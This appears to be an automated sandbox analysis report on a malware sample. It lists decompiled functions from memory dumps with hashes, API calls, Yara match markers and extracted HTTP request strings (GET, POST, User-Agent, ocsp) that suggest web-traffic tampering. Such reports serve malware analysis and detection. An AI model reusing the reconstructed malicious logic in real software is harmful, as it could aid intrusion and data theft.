Opcode ID: 3f5adda569c208f6c73df4a681e5c5167a73ec6d9ed3bd82fc5a238096bd68e2
Instruction ID: a8162519d9be896bba2c897eb5f39f42925938bef3eee2c3b5bb112ea7e7636a
Opcode Fuzzy Hash: 3f5adda569c208f6c73df4a681e5c5167a73ec6d9ed3bd82fc5a238096bd68e2
Instruction Fuzzy Hash: 1E322771A00205DBDF19EF68C4907ADBBF2FF84314F2485EAD859AB286D774DA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004023C5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023C5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x404178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4041c0 = 1;
										__eflags =  *0x4041c0;
										if( *0x4041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x404178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x404178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x40417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4041c0 = 1;
							__eflags =  *0x4041c0;
							if( *0x4041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x404180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x404178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x004023cf
0x004023d2
0x004023d8
0x004023f6
0x00000000
0x004023f6
0x004023e0
0x004023e9
0x004023ef
0x004023fe
0x00402401
0x00402404
0x0040240e
0x0040240e
0x00402410
0x00402413
0x00402415
0x00402415
0x00402417
0x0040241a
0x00000000
0x00000000
0x0040241c
0x0040241e
0x00402484
0x00402484
0x004025e2
0x00000000
0x004025e2
0x00402420
0x00402420
0x00402424
0x00402426
0x00402426
0x00402426
0x00402426
0x00402429
0x0040242a
0x0040242d
0x0040242d
0x00402431
0x00402435
0x00402443
0x00402443
0x0040244b
0x00402451
0x00402453
0x00402455
0x00402465
0x00402472
0x00402476
0x0040247b
0x0040247d
0x004024fb
0x004024fb
0x0040247f
0x0040247f
0x0040247f
0x004024fd
0x004024ff
0x004025e0
0x004025e0
0x00000000
0x00402505
0x00402505
0x0040250c
0x00000000
0x00000000
0x00402512
0x00402516
0x00402572
0x00402574
0x0040257c
0x0040257e
0x00402580
0x00000000
0x00000000
0x00402582
0x00402588
0x0040258a
0x0040258c
0x004025a1
0x004025a1
0x004025a3
0x004025d2
0x004025d9
0x00000000
0x004025d9
0x004025a7
0x004025a8
0x004025aa
0x004025ac
0x004025ac
0x004025ae
0x004025b0
0x004025b2
0x004025c6
0x004025c6
0x004025c9
0x004025cb
0x004025cb
0x004025cc
0x004025cc
0x00000000
0x004025b4
0x004025b4
0x004025b4
0x004025bd
0x004025be
0x004025c0
0x004025c2
0x004025c2
0x00000000
0x004025b4
0x004025b2
0x0040258e
0x00402595
0x00402595
0x00402597
0x00000000
0x00000000
0x00402599
0x0040259a
0x0040259d
0x0040259f
0x00000000
0x00000000
0x00000000
0x0040259f
0x00000000
0x00402595
0x00402518
0x0040251b
0x00402520
0x00000000
0x00000000
0x00402529
0x0040252b
0x00402531
0x00000000
0x00000000
0x00402537
0x0040253d
0x00000000
0x00000000
0x00402543
0x00402545
0x0040254e
0x00402552
0x00000000
0x00000000
0x00402558
0x0040255b
0x0040255d
0x00000000
0x00000000
0x00402564
0x00402566
0x00000000
0x00000000
0x00402568
0x0040256c
0x00000000
0x00000000
0x00000000
0x0040256c
0x00000000
0x00000000
0x00000000
0x00402457
0x00402457
0x00402457
0x0040245e
0x00000000
0x00000000
0x00402460
0x00402461
0x00402463
0x00000000
0x00000000
0x00000000
0x00402463
0x0040248b
0x0040248d
0x00000000
0x00000000
0x0040249d
0x0040249f
0x004024a1
0x00000000
0x00000000
0x004024a7
0x004024ae
0x004024da
0x004024da
0x004024dc
0x004024de
0x004024f2
0x004024f4
0x00000000
0x00000000
0x00000000
0x00000000
0x004024e0
0x004024e0
0x004024e0
0x004024e9
0x004024ea
0x004024ec
0x004024ee
0x004024ee
0x00000000
0x004024e0
0x004024b0
0x004024b3
0x004024b5
0x004024c7
0x004024c7
0x004024ca
0x004024cc
0x004024cc
0x004024cd
0x004024cd
0x004024d3
0x00000000
0x00000000
0x00000000
0x00000000
0x004024b7
0x004024b7
0x004024b7
0x004024be
0x00000000
0x00000000
0x004024c0
0x004024c0
0x004024c1
0x00000000
0x00000000
0x00000000
0x004024c1
0x004024c3
0x004024c5
0x004024d8
0x00000000
0x00000000
0x00000000
0x004024d8
0x00000000
0x004024c5
0x00402437
0x0040243a
0x0040243d
0x00000000
0x00000000
0x0040243f
0x00402441
0x00000000
0x00000000
0x00000000
0x00402441
0x00402406
0x00402408
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402476

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: b5805401ff84de1251a06a45869a74ddea524de5b1189431e6f5880f5cfe0e10
Instruction ID: d132edae8debd7fc36855b03b9a9d8c55ccecbb56f25dff6ad4833b78f8dd946
Opcode Fuzzy Hash: b5805401ff84de1251a06a45869a74ddea524de5b1189431e6f5880f5cfe0e10
Instruction Fuzzy Hash: 1461D770600506AFDB29CF29DF9C62A77A5EB95354F24803BD906F72D1E3B8DC82865C

Uniqueness

Uniqueness Score: -1.00%

Function 02B74C03, Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

@, xrefs: 02B74F3D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 7d5a2ddf2a398a22f6029af124e529ef0fe7fccb5ef2c6801e84936600dc717c
Instruction ID: 51f28b777f15c312f0f0c0fac81b925498c8e2afb85f0685558f4a333d19c355
Opcode Fuzzy Hash: 7d5a2ddf2a398a22f6029af124e529ef0fe7fccb5ef2c6801e84936600dc717c
Instruction Fuzzy Hash: 91D15C71E0425ACFCF18CFA8C4906EEBBB2FF84315F2485ADE8629B290E7715955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B79781, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 02B797F1

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: d16abf7d73c77aaabf1090439d361f402ec82777c24f45701b19bccc969c08ec
Instruction ID: a1e42eb852bcfa22d32aa130d322768d4b6075f9b1c0789e7cf06b15397ba4dc
Opcode Fuzzy Hash: d16abf7d73c77aaabf1090439d361f402ec82777c24f45701b19bccc969c08ec
Instruction Fuzzy Hash: 8811E332104149BFDF025F98DD41DDA7B66FF09364F454655FE2952120C732D872EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B84C67, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 02B84C7F

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: f27396ade8f1c8bb6314fd60891631dfd9f84d6fa92332b2fe27269ff67ad99a
Instruction ID: a2c0cd704343f1127a868cc7b6f0fd236055ceb28a3e08ee71a563be31b267c2
Opcode Fuzzy Hash: f27396ade8f1c8bb6314fd60891631dfd9f84d6fa92332b2fe27269ff67ad99a
Instruction Fuzzy Hash: C6C01231A442027FDA186A10DA1D92A7B29EB90380F00481CF14D82060D7B09860CB21

Uniqueness

Uniqueness Score: -1.00%

Function 02B8D7BD, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beba2ff71ce914eba8da0321ace47ea6c354673951a910f6a87f87a3454b1bdd
Instruction ID: ea82aa0ef09c890dcbfff126f61c21e49044d24a1589dcd2e1b15330ec16d49d
Opcode Fuzzy Hash: beba2ff71ce914eba8da0321ace47ea6c354673951a910f6a87f87a3454b1bdd
Instruction Fuzzy Hash: 5C423771E00219DBCF18DF68C5906ACBBF2FF89315F1881EAD856AB289D7749A40DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B93EAF, Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction ID: 407593ef9ada54c4bc7bc45b25f0ea19c26bba268d489f3d6096981e5a1c02c1
Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction Fuzzy Hash: 02F13430A08659ABCF0CCF99D4A05BDBBB2FF89314B14C1AEE4A667745CB345A46CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02B848AD, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: e47bf4a30dab969152deee628bb8fcd5917b235a7db5724dd5197dc09eec71a5
Instruction ID: 40a742dfb36f7f282f5eeee76e648ed39f883ba52e62e424666e890d1dc87b3e
Opcode Fuzzy Hash: e47bf4a30dab969152deee628bb8fcd5917b235a7db5724dd5197dc09eec71a5
Instruction Fuzzy Hash: FBC1EF39600B518FD325EF29C580AA6B7F1FF49304B5449AED9DA87B61D775F881CB00

Uniqueness

Uniqueness Score: -1.00%

Function 004021A4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E004021A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0040230B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E004023C5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E004022B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0040230B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E004023A7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x004021a8
0x004021a9
0x004021aa
0x004021ad
0x004021af
0x004021b2
0x004021b3
0x004021b5
0x004021b6
0x004021b7
0x004021ba
0x004021c4
0x00402275
0x0040227c
0x00402285
0x004021ca
0x004021ca
0x004021d0
0x004021d6
0x004021d9
0x004021dc
0x004021e0
0x004021e5
0x004021ea
0x0040226a
0x00000000
0x004021ec
0x004021ec
0x004021f8
0x004021fa
0x00402255
0x00402255
0x0040225b
0x00000000
0x004021fc
0x0040220b
0x0040220d
0x0040220e
0x0040220f
0x00402212
0x00402212
0x00402214
0x00000000
0x00402216
0x00402216
0x00402260
0x00402218
0x00402218
0x0040221c
0x00402224
0x00402229
0x0040222e
0x0040223a
0x00402242
0x00402249
0x0040224f
0x00402253
0x00000000
0x00402253
0x00402216
0x00402214
0x00000000
0x004021fa
0x0040226e
0x0040226e
0x0040226e
0x004021ea
0x0040228a
0x00402291

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 8b19255230e895d6cb8885bae953e3e4a805214ceb28b2f4633ad6503cf20bd9
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: C621B5329002049BCB10EFB9C9889ABB7A5FF48350B4580ADED15AB2C5D774FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 02B97188, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction ID: 073d540fd03cc4e520c3112ca4b081d39f526d29c8068d9164b8b471369ef608
Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction Fuzzy Hash: BD21C4B29102049BCF10DF68C8809A7FBE5FF45350B0580B9ED998B245EB30F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B71E8A, Relevance: 51.4, APIs: 34, Instructions: 399synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B839D7: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 02B83A0B
Part of subcall function 02B839D7: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 02B83ACC
Part of subcall function 02B839D7: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 02B83AD5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 02B71F28

Part of subcall function 02B73828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 02B73842
Part of subcall function 02B73828: CreateWaitableTimerA.KERNEL32(02B9E0D4,00000003,?), ref: 02B7385F
Part of subcall function 02B73828: GetLastError.KERNEL32(?,?,02B83A3F,?,?,?,00000000,?,?,?), ref: 02B73870
Part of subcall function 02B73828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,02B83A3F,?,?,?,02B83A3F,?), ref: 02B738B0
Part of subcall function 02B73828: SetWaitableTimer.KERNEL32(00000000,02B83A3F,00000000,00000000,00000000,00000000,?,?,02B83A3F,?), ref: 02B738CF
Part of subcall function 02B73828: HeapFree.KERNEL32(00000000,02B83A3F,00000000,02B83A3F,?,?,?,02B83A3F,?), ref: 02B738E5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 02B71F8B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02B7200B
WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 02B720B0

Part of subcall function 02B808B3: RtlAllocateHeap.NTDLL(00000000,00000010,76D7F730), ref: 02B808D5
Part of subcall function 02B808B3: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?,?,?,?,02B71F61,?), ref: 02B80906

WaitForSingleObject.KERNEL32(?,00000000,?), ref: 02B720E5
WaitForSingleObject.KERNEL32(?,00000000), ref: 02B720F4
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02B72121
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 02B7213B
_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 02B72183
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 02B7219D
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B721B3
ReleaseMutex.KERNEL32(?), ref: 02B721D0
WaitForSingleObject.KERNEL32(?,00000000), ref: 02B721E1
WaitForSingleObject.KERNEL32(?,00000000), ref: 02B721F0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02B72224
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 02B7223E
SwitchToThread.KERNEL32 ref: 02B72240
ReleaseMutex.KERNEL32(?), ref: 02B7224A
WaitForSingleObject.KERNEL32(?,00000000), ref: 02B72288

Part of subcall function 02B7AC31: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 02B7AC4F
Part of subcall function 02B7AC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,76D7F710,00000000,?,76D7F710,00000000), ref: 02B7AC74
Part of subcall function 02B7AC31: RtlAllocateHeap.NTDLL(00000000,?), ref: 02B7AC85
Part of subcall function 02B7AC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 02B7ACA0
Part of subcall function 02B7AC31: HeapFree.KERNEL32(00000000,?), ref: 02B7ACBE
Part of subcall function 02B7AC31: RegCloseKey.ADVAPI32(?), ref: 02B7ACC7

WaitForSingleObject.KERNEL32(?,00000000), ref: 02B72293
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02B722B6
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 02B722D0
SwitchToThread.KERNEL32 ref: 02B722D2
ReleaseMutex.KERNEL32(?), ref: 02B722DC
WaitForSingleObject.KERNEL32(?,00000000), ref: 02B722F1
CloseHandle.KERNEL32(?), ref: 02B7233F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B72353
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B7235F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B7236B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B72377
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B72383
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B7238F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 02B7239B
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 02B723AA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
String ID:
API String ID: 3804754466-0
Opcode ID: 75cd0c73edae72d711ed43702c686d664f8abdfeaf199da6d590cac262ca6f07
Instruction ID: fe8ca8e7d73cebf5fa946c777062440582c61468d98062bc311580c3d8630fb3
Opcode Fuzzy Hash: 75cd0c73edae72d711ed43702c686d664f8abdfeaf199da6d590cac262ca6f07
Instruction Fuzzy Hash: 4BE19371808305AFDB11AF69CD8196BBBE9FB85394F014A6EF9A4931A0D730DD50CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02B90228, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 378memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,00000000,?,?), ref: 02B90280
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02B9031A
lstrcpyn.KERNEL32(00000000,?,?), ref: 02B9032F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B9034B
StrChrA.SHLWAPI(?,00000020,?,?), ref: 02B90426
StrChrA.SHLWAPI(00000001,00000020), ref: 02B90437
lstrlen.KERNEL32(00000000), ref: 02B9044B
memmove.NTDLL(?,?,00000001), ref: 02B9045B
lstrlen.KERNEL32(?,?,?), ref: 02B9047E
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B904A4
memcpy.NTDLL(00000000,?,?), ref: 02B904B8
memcpy.NTDLL(?,?,?), ref: 02B904D8
HeapFree.KERNEL32(00000000,?), ref: 02B90514
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B905DA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 02B90622

Strings

Content-Type:, xrefs: 02B90386
POST, xrefs: 02B9025B
GET , xrefs: 02B9024D
ocsp, xrefs: 02B90393
GET , xrefs: 02B90413
Accept-Encoding:, xrefs: 02B9046B
OPTI, xrefs: 02B90262
, xrefs: 02B9027B, 02B902AC
OPTI, xrefs: 02B9041B
User-Agent:, xrefs: 02B902F9
gzip, deflate, xrefs: 02B90466
PUT , xrefs: 02B90254

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-537135598
Opcode ID: 1a6a2acaa28244fdd482261a9cedd4ce8d49abbf4c59286bba391c588bb9e77d
Instruction ID: cdbb663e2afd17250952a0c8b78742ee90606d68ce6c134770e1895d0231d9fe
Opcode Fuzzy Hash: 1a6a2acaa28244fdd482261a9cedd4ce8d49abbf4c59286bba391c588bb9e77d
Instruction Fuzzy Hash: DAD14A71A00205EFDF11EFA8C984BAD7BB5FF05354F1489A8E819EB261D730E961DB50

Uniqueness

Uniqueness Score: -1.00%

